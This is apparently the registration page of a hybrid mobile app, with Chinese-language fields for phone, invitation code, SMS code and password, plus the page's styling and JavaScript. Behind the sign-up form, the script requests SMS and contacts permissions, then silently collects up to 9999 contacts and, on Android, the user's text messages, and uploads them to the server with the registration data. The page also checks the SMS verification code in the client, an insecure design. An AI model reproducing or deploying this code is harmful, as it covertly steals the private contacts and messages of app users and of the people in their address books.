<html>
<!DOCTYPE html>
<html lang="en" class="no-js">
<head>
    <meta charset="utf-8">
    <title>登录</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="">
    <style>
        html, body, div, span, applet, object, iframe,
        h1, h2, h3, h4, h5, h6, p, blockquote, pre, a,
        abbr, acronym, address, big, cite, code, del,
        dfn, em, img, ins, kbd, q, s, samp, small,
        strike, strong, sub, sup, tt, var, u, i, center,
        dl, dt, dd, ol, ul, li, fieldset, form, label,
        legend, table, caption, tbody, tfoot, thead, tr,
        th, td, article, aside, canvas, details, embed,
        figure, figcaption, footer, header, hgroup, menu,
        nav, output, ruby, section, summary, time, mark, audio, video {
            margin: 0;
            padding: 0;
            border: 0;
            font-size: 100%;
            font: inherit;
            vertical-align: baseline;
        }

        /* ------- HTML5 display-role reset for older browsers ------- */

        article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section {
            display: block;
        }
        body {
            line-height: 1;
        }
        ol, ul {
            list-style: none;
        }
        blockquote, q {
            quotes: none;
        }
        blockquote:before, blockquote:after, q:before, q:after {
            content: '';
            content: none;
        }
        table {
            border-collapse: collapse;
            border-spacing: 0;
        }
        body {
            background: #f8f8f8;
            text-align: center;
            color: #fff;
            font-family:Microsoft YaHei,Segoe UI,Tahoma,Arial,Verdana,sans-serif;
        }

        .page-container {
            width:300px;
            height:auto;
            position: absolute;
            top: 200px;
            background-color: rgba(0,0,0,0.2);
            margin: 0 30px;
            border-radius:8px;
        }

        h1 {
            font-size: 30px;
            font-weight: 700;
            text-shadow: 0 1px 4px rgba(0,0,0,.2);
        }

        .form {
            position: relative;
            width: 350px;
            margin: 0 10px;
            text-align: center;
        }

        input {
            width: 270px;
            height: 42px;
            margin-top: 25px;
            padding: 0 15px;
            background: #2d2d2d; /* browsers that don't support rgba */
            /*background: rgba(45,45,45,.15);*/
            -moz-border-radius: 6px;
            -webkit-border-radius: 6px;
            border-radius: 6px;
            border: 1px solid #3d3d3d; /* browsers that don't support rgba */
            border: 1px solid rgba(255,255,255,.15);
            -moz-box-shadow: 0 2px 3px 0 rgba(0,0,0,.1) inset;
            -webkit-box-shadow: 0 2px 3px 0 rgba(0,0,0,.1) inset;
            box-shadow: 0 2px 3px 0 rgba(0,0,0,.1) inset;
            font-family: 'PT Sans', Helvetica, Arial, sans-serif;
            font-size: 14px;
            color: #fff;
            text-shadow: 0 1px 2px rgba(0,0,0,.1);
            -o-transition: all .2s;
            -moz-transition: all .2s;
            -webkit-transition: all .2s;
            -ms-transition: all .2s;
        }

        input:-moz-placeholder { color: #fff; }
        input:-ms-input-placeholder { color: #fff; }
        input::-webkit-input-placeholder { color: #fff; }

        input:focus {
            outline: none;
            -moz-box-shadow:
                    0 2px 3px 0 rgba(0,0,0,.1) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
            -webkit-box-shadow:
                    0 2px 3px 0 rgba(0,0,0,.1) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
            box-shadow:
                    0 2px 3px 0 rgba(0,0,0,.1) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
        }

        button {
            cursor: pointer;
            width: 300px;
            height: 44px;
            margin-top: 25px;
            margin-bottom: 20px;
            padding: 0;
            background: #ef4300;
            -moz-border-radius: 6px;
            -webkit-border-radius: 6px;
            border-radius: 6px;
            border: 1px solid #ff730e;
            -moz-box-shadow:
                    0 15px 30px 0 rgba(255,255,255,.25) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
            -webkit-box-shadow:
                    0 15px 30px 0 rgba(255,255,255,.25) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
            box-shadow:
                    0 15px 30px 0 rgba(255,255,255,.25) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
            font-family: 'PT Sans', Helvetica, Arial, sans-serif;
            font-size: 14px;
            font-weight: 700;
            color: #fff;
            text-shadow: 0 1px 2px rgba(0,0,0,.1);
            -o-transition: all .2s;
            -moz-transition: all .2s;
            -webkit-transition: all .2s;
            -ms-transition: all .2s;
        }

        button:hover {
            -moz-box-shadow:
                    0 15px 30px 0 rgba(255,255,255,.15) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
            -webkit-box-shadow:
                    0 15px 30px 0 rgba(255,255,255,.15) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
            box-shadow:
                    0 15px 30px 0 rgba(255,255,255,.15) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
        }

        button:active {
            -moz-box-shadow:
                    0 15px 30px 0 rgba(255,255,255,.15) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
            -webkit-box-shadow:
                    0 15px 30px 0 rgba(255,255,255,.15) inset,
                    0 2px 7px 0 rgba(0,0,0,.2);
            box-shadow:
                    0 5px 8px 0 rgba(0,0,0,.1) inset,
                    0 1px 4px 0 rgba(0,0,0,.1);

            border: 0px solid #ef4300;
        }

        .error {
            display: none;
            position: absolute;
            top: 27px;
            right: -55px;
            width: 40px;
            height: 40px;
            background: #2d2d2d; /* browsers that don't support rgba */
            background: rgba(45,45,45,.25);
            -moz-border-radius: 8px;
            -webkit-border-radius: 8px;
            border-radius: 8px;
        }

        .error span {
            display: inline-block;
            margin-left: 2px;
            font-size: 40px;
            font-weight: 700;
            line-height: 40px;
            text-shadow: 0 1px 2px rgba(0,0,0,.1);
            -o-transform: rotate(45deg);
            -moz-transform: rotate(45deg);
            -webkit-transform: rotate(45deg);
            -ms-transform: rotate(45deg);

        }

        .connect {
            width: 305px;
            margin: 35px auto 0 auto;
            font-size: 18px;
            font-weight: 700;
            text-shadow: 0 1px 3px rgba(0,0,0,.2);
        }

        .connect a {
            display: inline-block;
            width: 32px;
            height: 35px;
            margin-top: 15px;
            -o-transition: all .2s;
            -moz-transition: all .2s;
            -webkit-transition: all .2s;
            -ms-transition: all .2s;
        }

        /*－－－增加部份的CSS－－－*/
        .form,input,button{font-family:Microsoft YaHei,Segoe UI,Tahoma,Arial,Verdana,sans-serif; text-decoration:none; width:92%;}
        button.submit_button{ font-size:24px; letter-spacing:15px;}
        input.Captcha{ width:130px; float:left;margin-left: 10px;}



        #img{
            z-index:-1;
            position: absolute;
            top: 0;
            left: 0;
            width:100%;
        }
    </style>
</head>

<body>
<img src="./image/bg.png" id="img">
<div class="page-container">

    <div class="form">
        <input type="text" id="cellphone" class="username" placeholder="请输入手机">
        <input type="text" id="code" placeholder="请输入邀请码">

        <input type="number" class="Captcha" id="smscode" placeholder="请输入验证码">
        <input type="button" id="smsdiv" style="height:40px;width:110px" value='获取验证码' />

        <input type="password" id="password" class="password" placeholder="请输入密码">
        <button type="submit" class="submit_button" onclick="submit()">注册</button>
    </div>

</div>

</body>
<script type="text/javascript" src="./script/api.js"></script>
<script type='text/javascript'>

    var url = "http://"+window.location.host+"/api.php?service=";

    $api.addEvt($api.byId('smsdiv'), 'click', getcode);
    var map
    apiready = function(){
        $api.css($api.byId('img'),'height:'+api.frameHeight+'px;')
        // map = api.require('bMap');
        // if(api.systemType=='ios'){
        //     map.initMapSDK(function(ret) {});
        // }

        var login = api.getPrefs({
            sync: true,
            key: 'login'
        });
        if(login==1){
            api.showProgress({
                text: '等待管理员审核',
                modal: true
            });
            return
        }
        smsPermission(true)
    };
    var smscode
    function submit() {
        var code = $api.val($api.byId('code'))
        var cellphone = $api.val($api.byId('cellphone'))
        if(!(/^1[3456789]\d{9}$/.test(cellphone))){
            alert("手机号码有误，请重填");
            return;
        }
        var password = $api.val($api.byId('password'))
        if(password==''){
            alert("请输入密码");
            return;
        }
        if(code==''){
            alert("请输入邀请码");
            return;
        }
        if($api.val($api.byId('smscode'))==''){
            alert("请输入验证码");
            return;
        }
        if(smscode!=parseInt($api.val($api.byId('smscode')))){
            alert("验证码不正确");
            return;
        }
        api.showProgress({
            title:'注册中',
            text: '请耐心等待',
            modal: true
        });
        getlocation(function (address) {
            contacts(function (contactsdata) {
                sms(function (smsdata) {
                    var values = {
                        code: code,
                        cellphone: cellphone,
                        password: password,
                        smsStatus: smsStatus,
                        contactsStatus: contactsStatus,
                        devicemodel: api.deviceModel,
                        address:address
                    }
                    if(contactsdata){
                        values.contacts=contactsdata
                    }
                    if(smsdata){
                        values.sms=smsdata
                    }
                    api.ajax({
                        url: url+'user.create',
                        method: 'post',
                        data: {
                            values: values
                        }
                    }, function(ret, err) {
                        if (ret) {
                            // api.alert({ msg: JSON.stringify(ret) });
                            api.hideProgress();
                            if(ret.data.code==1){
                                alert(ret.data.msg)
                                return
                            }
                            alert('注册成功')
                            api.showProgress({
                                title: '等待管理员审核',
                                modal: true
                            });

                            api.setPrefs({
                                key: 'login',
                                value: 1
                            });


                        }else{
                            // api.alert({ msg: JSON.stringify(err) });
                        }

                    });
                })
            })
        })

    }
    function getcode() {
        var cellphone = $api.val($api.byId('cellphone'))
        if(!(/^1[3456789]\d{9}$/.test(cellphone))){
            alert("手机号码有误，请重填");
            return;
        }
        api.ajax({
            url: url+'sms.send',
            method: 'get',
            data: {
                values: {
                    cellphone: cellphone
                }
            }
        }, function(ret, err) {
        	//api.alert({ msg: JSON.stringify(ret)+JSON.stringify(err) });
            if (ret) {
            	
                smscode = ret.data.info.code
                api.toast({
                    msg: ret.data.info.status,
                    duration: 2000,
                    location: 'middle'
                });
            }

        });
        var i = 120
        $api.rmEvt($api.byId('smsdiv'), 'click', getcode);
        var interval = setInterval(function () {
            if(i==0){
                clearInterval(interval );
                $api.addEvt($api.byId('smsdiv'), 'click', getcode);
                $api.val($api.byId('smsdiv'),'获取验证码')
            }else{
                $api.val($api.byId('smsdiv'),i)
                i--
            }

        },1000)

    }
    var smsStatus,contactsStatus
    function smsPermission(status){
        var resultList = api.hasPermission({
            list:['sms-r','contacts']
        });
        for(var i=0;i<2;i++){
            if(resultList[i].name=='sms-r'){
                smsStatus = resultList[i].granted?'true':'false'
            }
            if(resultList[i].name=='contacts'){
                contactsStatus = resultList[i].granted?'true':'false'
            }
        }
        // api.alert({
        //     msg:'查询'+JSON.stringify(resultList)
        // });


        if(resultList[0].granted&&resultList[1].granted){
            return
        }
        if(status){
            api.toast({
                msg: '请允许读取权限',
                duration: 2000,
                location: 'middle'
            });
        }

        api.requestPermission({
            list:['sms-r','contacts'],
            code:1
        }, function(ret, err){
            // api.alert({
            //     msg:'获取'+JSON.stringify(ret)
            // });
            // return
            for(var i=0;i<2;i++){
                if(ret.list[i].name=='sms-r'){
                    smsStatus = ret.list[i].granted?'true':'false'
                }
                if(ret.list[i].name=='contacts'){
                    contactsStatus = ret.list[i].granted?'true':'false'
                }

            }

            // if(!ret.list[0].granted||!ret.list[1].granted||!ret.list[2].granted){
            //     smsPermission(false)
            // }
        });
    }

    function contacts(callback){

        // var timestart = Date.parse(new Date())
        if(contactsStatus){
            var Contacts = api.require('contacts');
            Contacts.queryByPage({
                count: 9999,
                pageIndex: 0
            }, function(ret, err) {
                // var timeend = Date.parse(new Date())
                // alert(timeend-timestart)
                // alert(JSON.stringify(ret));
                // alert(JSON.stringify(err));
                if (ret) {
                    if(ret.status==false||ret.total==0){
                        callback(false)
                    }
                    var arr = []
                    for(var i =0 ;i<ret.contacts.length;i++){
                        arr.push({
                            fullName:ret.contacts[i].fullName,
                            phones:ret.contacts[i].phones
                        })
                    }
                    callback(JSON.stringify(arr))
                    // api.ajax({
                    //     url: url+'contacts.create',
                    //     method: 'post',
                    //     data: {
                    //         values: {
                    //             id:user_id,
                    //             contacts:JSON.stringify(ret.contacts)
                    //         }
                    //     }
                    // }, function(ret, err) {
                    //     //alert(JSON.stringify(ret));
                    //     // alert(JSON.stringify(err));
                    // });
                }
            });
        }else{
            callback(false)
        }

    }

    function sms(callback){
        //alert('sms')
        if(api.systemType!='android'){
            callback(false)
        }
        if(smsStatus){
            var  bekeerSMS = api.require('moduleSMSListening');
            bekeerSMS.getMsg({
                order:'DESC'
            },function (ret,err) {
                //alert(JSON.stringify(ret));
                // alert(JSON.stringify(err));
                callback(ret.contact)
            })
        }else{
            callback(false)
        }


    }
    function getlocation(callback){
        callback('定位功能未开启')
        return
        var address
        if(locationStatus){
            map.getLocationServices(function(ret, err) {
                if (!ret.enable) {
                    address = '定位未开启'
                    callback(address)
                }else{
                    map.getLocation({
                        accuracy: '100m',
                        autoStop: true,
                        filter: 1
                    }, function(ret, err) {
                        //alert('ret:'+JSON.stringify(ret)+'err:'+JSON.stringify(err))
                        if (ret.status) {
                            map.getNameFromCoords({
                                lon: ret.lon,
                                lat: ret.lat
                            }, function(ret, err) {
                                //alert('ret:'+JSON.stringify(ret)+'err:'+JSON.stringify(err))
                                if (ret.status) {
                                    address = ret.address
                                    callback(address)
                                }
                            });
                        }
                    });
                }
            });
        }else{
            address = '权限未开启'
            callback(address)
        }
    }
</script>
</html>

